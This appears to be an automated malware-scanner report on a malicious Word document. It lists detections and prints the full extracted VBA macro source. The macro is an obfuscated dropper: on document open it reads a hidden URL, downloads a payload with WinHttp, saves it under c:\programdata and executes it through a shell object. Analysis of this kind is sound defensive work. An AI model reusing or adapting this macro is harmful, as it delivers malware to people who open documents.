MALICIOUS
170
Risk Score
Heuristics 6
-
ClamAV: Doc.Dropper.Generic-9823539-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Generic-9823539-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set zXxwu = CreateObject("WinHttp.WinHttpRequest.5.1") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10651 bytes |
SHA-256: f9b9f2660a6cea6c521b3f5d72b511604f595108c807796f0217481ce224160a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ayRvU"
Sub BqFBT(LZeBE, Optional ByVal pCLRH As String = "c:\programdata\RZxGk.pdf")
' Adiabatically corruptions risked
' Wracked
' Adoptions powder
' Nevertheless ideographic reintroduces triplets
' Epigones inconsolable spectrometry splaying constrain incorporating
' Defecting sexually
' Culminated birthrights
' Tiptoed restaurateurs spluttering sunning
' Pavings conspiratorial skuas programmatic rebooted restaurateur
' Cannibalism joyful
' Danes swampiest
' Disturbance suffocatingly
' Stylishness
' Twisting
' Crumbles frivolities glade kleptomaniacs
' Hydroelectricity
' Lacteal sinless moisturiser
' Multimedia obstinately libraries
' Advisory bribes conducted
' Travelled bowman riverside fingering
' Flavour
' Weird monarchy
' Furtiveness speciality levitated overmatching
' Fatless operas
' Visiting catcalls kindlier
' Flits itemises beyond scavenging
' Politely translated
' Abdication grey
' Phenomenologists
' Perforate floppier
' Futon scalars prelude diversifies grumbled
' Drown civilised abscissa
' Underestimates echidna steadfastness bloomers
' Deck oinked creditably strontium
' Sausage strawberries retrofit
' Sailors proliferates
' Electromagnetism
' Morocco costarred
' Tempt chortled readies asinine
Ntegx = pCLRH
Open Ntegx For Output As #1
' Adds wicked
' Perambulations demographer
' Fusible muddling restfulness jaywalker
' Gleans vindictive
' Swagger ought following
' Handsomely doggedness survivable
Print #1, LZeBE
' Mights softspoken crisis debris machinegun
' Octaves chemiluminescence cough
' Declassification prompts transposes reptile reportage substratum
' Cloaks barometers robust insisting insatiably revere
' Hosannas volunteers effulgent smudgiest
' Standardisations secularists foresters
' Few blindfolded stoves
' Suavely bogus hinterland
Close #1
End Sub
' Excelled cubistic absorbs postoperative
' Dither spoil
' Instant balsam prayerbook decentralise
' Patch directorship
' Scrummage diligence fated chicane
' Aldehyde ruled reforms
Sub AutoOpen()
' Alms junkyard chamfered industriousness
' Intoned spongier squealer tearful
' Spacers shielded
' Rutted preadolescent coughs convening
' Ochre reafforestation appreciation concatenations transforming
' Conceptions fuzziness
' Hosier rhumbas
' Notions homeowner cardinality
' Abbeys pickets worshipper immaculately transcript
' Reworded trellis
' Normalisations premieres
' Brackish thyristor variants wealthy
' Biosynthesis wristband
' Refinery arguable
' Rubbed competency
' Filed pungently delimits caretaker typeless
' Mondays redox gumming ashbin
' Geometry chequer
' Modems boos peculiarity
' Whiling biceps debated cops modifier
' Subjected evened classifiers postlude subzero death
' Contort methadone
' Undiscerning preparer room observational meow hexed
' Wealthy grounded
' Bouncy unclassifiable
' Planed penology
' Distil handrail unfurled
' Exchangers sneakiest
Dim NCZmF As New WIUMH
' Pure incense magma iconographical
' Decadence religiosity amity progressions improvising abreast mosque
' Adverb preach proposes
' Blindingly unclean
' Typify
' Recalcitrant discriminator
LZeBE = NCZmF.rlcsy()
' Profittaking bombarding empire infinitesimal
' Attributions abdicated cook rightwards brutishness
' Authentic cubit expander loosen
' Budging unvoiced lurched differentials grandpas hefted
BqFBT xriAE(LZeBE)
' Speed status tabloid honouring stretchers
' Hewed promptings
' Lexicographical stocks pupae
' Thrones rheology voted moat
' Overfull focal rancorous woodenness
' Befell narrators
' Pollination rigidify
' Repress
' Orientation comprehensively bedtimes
' Guidebook chippings lepton
' Drafty hypnotic
zPxXD rDNMv(0) + "r32 c:\programdata\RZxGk.pdf", ""
End Sub
Function nnSdv(RgMGi, KByxv)
' Fork
' Pneumonia brutus aesthetically accuser
' Stammering accesses pinstripes
' Coppers excommunicated faced
nnSdv = Split(RgMGi, KByxv)
End Function
Attribute VB_Name = "ykvSK"
' Parliamentarian soma igloo bowman foundling unbalance
' Belong enshrined harmfully
' Foaled figtree
' Tip maya tempera
' Workmanlike
Function xriAE(fjRvf)
' Minting hummock unread
' Apologise scantiest storerooms skinner
' Confluence famously snowballing droller gudgeon
' Bristly controls highwaymen
' Uninterruptedly allotrope
' Ode complain linnets proceeding
' Reactivate philosophise fewest domiciliary necked
' Dent rampage dishing
xriAE = StrConv(fjRvf, vbUnicode)
' Implausibility debugs floodlit integrands satisfactory
' Waists unbroken catalogues
' Depended rehearse secondary
' Hundredfold requisitioned parsons
' Propose exhilarated misinform possesses hotline
' Toilette unfastening
End Function
' Disassociation stays
' Occident somas cloudburst juror rubber
' Evoke dreads
' Philosophising readiest romanticises renaming
' Screechiest mature
' Larches squarer gnashed unspecialised
' Unclad housebreaker
Function UbAad()
' Jiujitsu milk speechifying apartness
' Eraser diagonals
' Lyons providence bluffs
' Dissembled tows interment fertiliser manipulate coddle
' Billboard sheepskins aerobics rainfall mystified
' Seduced midi luminously freeway mention
' Dealings
' Restrains chiropody
' Intercept
' Swordfish hurrying
' Unjustness
UbAad = ActiveDocument.shapes(1).AlternativeText
End Function
' Impaired transformed skiing
' Codpiece pinkish permafrost talked
' Vista clocked indiscriminate majorettes declared
' Prodigy emulated resold
' Freedoms flashier downs
' Catapult democratising culturally beckoning
' Miss controlling conceptualise skimpy
Function rDNMv(HTfUJ)
' Respiration shunters darned suppositions
' Factions
' Plumed gravy mandolin
' Patchily thudded lewd
' Unmonitored edifies installing whomsoever
' Wiggling maziest
' Complimented
' Modernistic merited fishhooks thereupon marvellous fakers
' Dearie halfheartedly deism coralline shortcut epithelial
' Retrieves
' Gemstone cumulative slogans eurasian spruced
' Dodged cleanser exclusivist
BMOhr = UbAad()
ZCchk = nnSdv(BMOhr, "kristi")
AZCgh = ZCchk(HTfUJ)
rDNMv = AZCgh
End Function
Attribute VB_Name = "WIUMH"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Subliminal associated expectations
' Frizzle humidifiers closets flirts
' Universality scupper lured peelers
' Instantiations dendritic disseminated safe
Function rlcsy()
' Stencil intuitiveness imparted hedgerow enumerator
' Disgusting
' Miniature caviare perusing surmising reformers disenfranchising
' Clink irresolutely singularity glycerol
Dim zXxwu As Object
' Squares overlapping
' Lamination putter racquets thanked
' Freaky newfangled potentialities towering successes
' Frolicsome pocketful lucrative
' Interlap where
Set zXxwu = CreateObject("WinHttp.WinHttpRequest.5.1")
' Birdies
' Hotbed waiter kilns unpeeled
' Hooks trouble inadvisable ponderous
' Quavering airlifts lieutenancy propped representational shard
' Solve feeble
' Insatiably roebuck parity
' Cunnilingus silkworms instance
' Infinitude boisterous archivist canted inherently
' Windmill conjunctions croaked analyse gym
' Galling mating garment
' Tumbled beach
' Porker
' Fearless outposts rallies beneficial reorganisation backstairs
' Overwork metered
' Teenyweeny lubricate casework vendettas
' Quasi
' Paralyses gimmickry
' Statutorily morning patents
' Wish bends commented animate
' Adoration mastiff mastered subscribes
' Rubbed vermin picks
' Existing smelting ecosystem
' Flagging drowns islamic
' Luminosity dizzying potentates dissociated wellbred
' Backbones bloodbath
' Aviary antecedent portraits buffetings
' Cagiest breaking hazy baptismal boozer
' Cult barbarities goblins
' Planetesimals pitchforks soccer occupations knuckle
' Manifesto opportunist targets
DKiNk = rDNMv(1)
' Bees stoats cantaloupe
' Cooperated kettles comprising transversely icicles
' Hider exchange
' Peter infusions equals pillages corn
' Monetarists burgles
zXxwu.Open "GET", DKiNk, False
' Mudlarks subscriptions
' Ferries boers idiolect depleted
' Retaining angular
' Contact repentance
zXxwu.Send
' Impious build
' Labourers namecalling hyenas bandwidths
' Enjoyable blackcurrants craftsman orphanages hydrangea accommodated
' Porcupines husked seedbed
' Antibody adorable
' Matched nineteenth
' Snuffles instant optics
rlcsy = zXxwu.responsebody
End Function
Attribute VB_Name = "TmAyk"
Sub zPxXD(GiFhR, xOyxr)
' Lobotomising minerals
' Conversant spankings
' Wrings sibilancy
' Utility finish timetabled
' Filament daintier carats resits
' Peacetime sinister speeding adjoin
' Werewolf unprejudiced undercover
' Irking deepening syringes deploys fluctuated
' Mainstream pompeii inform unparodied
' Fiddler instantiate
Set yAcTw = CreateObject(xOyxr + rDNMv(2) + "ll").exec(GiFhR)
' Jemmy rhyme eyeglass swoon sweeps shorted
' Generation
' Covens pubs gallium gravitationally ruralist forcefeeding
' Chaperon
' Importer purchase stole
' Motivational archaeological rankings day
' Muzzling waft
' Spooks misguidedly reclaimed obituaries chockfull lubricating
' Hijacks perverted defaces yankee
' Mechanistic earlobes
' Peerage sabbaticals
' Ems ambuscades generous megalomaniac
' Interrogators masochistically eking anthropogenically coaction kenya chagrin
' Updated mutated litanies
' Everlastingly crampons cables weeping pickaxe spanner
' Distantly alighted licorice limericks sluggish
' Ministrations gate decaffeinated
' Brutally
' Slipper
' Bothered
' Annuities teetotallers inactivated sophisticated triatomic devaluation
' Bedfellows deducts
' Cloaking
' Saucepan cigar
' Annal orchestrator skindeep
' Thinned fathers coastlines stifle tenser
' Outdoing biologists
' Crumples microprocessor smithy
' Eras incisions immunity fourth
' Rumpuses upholders irrepressibly shoehorn
' Rutted predicted
' Yuppie drop falsifiable
' Elopes public monitor installable
' Twiddly fluoridation snuffing
' Swimming headwind harsher
' Ordeals
' Monstrously matings inconclusive enduring
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 41984 bytes |
SHA-256: c296a45926d7b216191186f851ae4d9c65fb9d5ec9743695684f8c9497706a21 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.